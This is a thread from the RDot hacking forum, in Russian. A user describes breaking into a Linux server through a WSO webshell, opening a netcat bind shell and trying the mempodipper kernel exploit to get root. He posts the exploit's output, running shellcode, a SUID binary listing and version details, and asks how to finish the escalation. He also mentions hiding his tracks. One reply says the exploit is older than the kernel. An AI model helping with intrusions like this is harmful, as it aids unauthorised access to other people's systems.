RDot

RDot (https://rdot.org/forum/index.php)
-   Повышение привилегий/Privilege escalation (https://rdot.org/forum/forumdisplay.php?f=24)
-   -   Linux 3.2.0-4 & mempodipper.c (https://rdot.org/forum/showthread.php?t=3657)

rodikdodik 18.05.2016 07:20

Linux 3.2.0-4 & mempodipper.c
 
Господа. получил шелл через WSO-webshell. прокинул:
Цитата:

nc -lp XXXXX -e /bin/sh
Но большинство эксплоитов не работают. заметил только что mempodipper пытается что-то сделать. даже поменял /bin/su на /usr/bin/chsh как нашел в интернете. но в итоге выходит это:
Цитата:

[+] Opening parent mem /proc/2216/mem in child.
[+] Sending fd 6 to parent.
Дальше сессия зависает и не отвечает
Открываю консоль в WSO и смотрю процессы
Цитата:

$ ps aux | grep root
root 2216 100 0.0 20940 900 ? R 05:37 1:00 chsh H1??i..H1??j..H1?@?.@?.?!..H?//bin/shH??.SH??H1?f?-iSH??H1?PQWH??H1??;..
Процесс запущен под рутом и нагружает память под 100%. То есть теоретически эксплойт работает но не может никак мне помочь. Убиваю процесс и nc снова оживает.

Можно ли что-то сделать в таком случае? Перепробовал все эксплойты до которых добрался. Даже уроинл сервер один раз. Инфа о сервере:
Цитата:

Linux 3.2.0-4-amd64 #1 SMP Debian 3.2.46-1 x86_64 GNU/Linux

suid:
rwsr-xr-- 1 root messagebus 292K Jun 12 2013 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10K Dec 24 2012 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 11K Jan 27 2015 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 240K Jun 30 2014 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root www-data 19K Mar 5 2013 /usr/lib/apache2/suexec
-r-sr-xr-x 1 root root 142K Nov 2 2015 /usr/local/ispmgr/cgi/bdownload
-r-sr-xr-x 1 root root 48K Jul 27 2014 /usr/local/ispmgr/cgi/upload
-r-sr-xr-x 1 root root 20K Jul 27 2014 /usr/local/ispmgr/cgi/outlook
-r-sr-xr-x 1 root root 32K Jul 27 2014 /usr/local/ispmgr/cgi/dbdownload
-r-sr-xr-x 1 root root 142K Nov 2 2015 /usr/local/ispmgr/cgi/getuser
-r-sr-xr-x 1 root root 8.1K Jul 27 2014 /usr/local/ispmgr/cgi/ispmgr
-r-sr-xr-x 1 root root 13K Jul 27 2014 /usr/local/ispmgr/cgi/login
-r-sr-xr-x 1 root root 53K Jul 27 2014 /usr/local/ispmgr/cgi/download
-r-sr-xr-x 1 root root 38K Jun 1 2015 /usr/local/ispmgr/cgi/xml2csv
-r-sr-xr-x 1 root root 53K Jul 27 2014 /usr/local/ispmgr/cgi/mindterm
-r-sr-xr-x 1 root root 52K Jul 27 2014 /usr/local/ispmgr/cgi/cronrun
-r-sr-xr-x 1 root root 56K Jul 27 2014 /usr/local/ispmgr/cgi/certdownload
-r-sr-xr-x 1 root root 65K Jul 27 2014 /usr/local/ispmgr/sbin/responder
-r-sr-xr-x 1 root root 1.8M Nov 2 2015 /usr/local/ispmgr/sbin/usermove
-r-sr-xr-x 1 root root 5.6K Sep 7 2015 /usr/local/ispmgr/sbin/suexec
-r-sr-xr-x 1 root root 1.2M Nov 2 2015 /usr/local/ispmgr/sbin/pbackup
-r-sr-xr-x 1 root root 36K Jul 27 2014 /usr/local/ispmgr/sbin/vacation
-r-sr-xr-x 1 root root 1.5M Nov 2 2015 /usr/local/ispmgr/bin/ispmgr
-rwsr-xr-x 1 root root 92K Apr 16 2012 /usr/bin/mtr
-rwsr-sr-x 1 daemon daemon 55K Jun 9 2012 /usr/bin/at
-rwsr-xr-x 1 root root 36K May 26 2012 /usr/bin/newgrp
-rwsr-xr-x 1 root root 15K Apr 12 2011 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 46K May 26 2012 /usr/bin/chfn
-rwsr-xr-x 1 root root 50K May 26 2012 /usr/bin/passwd
-rwsr-xr-x 1 root root 67K May 26 2012 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 41K May 26 2012 /usr/bin/chsh
-rwsr-xr-x 2 root root 111K Mar 1 2013 /usr/bin/sudoedit
-rwsr-xr-x 2 root root 111K Mar 1 2013 /usr/bin/sudo
-rwsr-xr-x 1 root root 36K Apr 12 2011 /bin/ping
-rwsr-xr-x 1 root root 93K Dec 11 2012 /bin/mount
-rwsr-xr-x 1 root root 36K May 26 2012 /bin/su
-rwsr-xr-- 1 root fuse 31K Jan 2 2013 /bin/fusermount
-rwsr-xr-x 1 root root 68K Dec 11 2012 /bin/umount
-rwsr-xr-x 1 root root 37K Apr 12 2011 /bin/ping6
PHP 5.4.4-14+deb7u14
perl 5, version 14, subversion 2 (v5.14.2)
SHELLSHOCK работает
passwd показать не могy, много палева
Прав на задачи в кроне нет. Дыр в exim нет. Есть OpenSSH с открытыми портами и PermitRootLogin=yes.
Сижу под www-data. /bin/sh прав нет даже на свой хоум фолдер.
Быть может можно встроить код в сам эксплоит?

SynQ 18.05.2016 12:39

Эксплойт опубликован в январе 2012, ядро от 08 Jun 2013 22:36:14 +0100


Часовой пояс GMT +3, время: 22:44.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot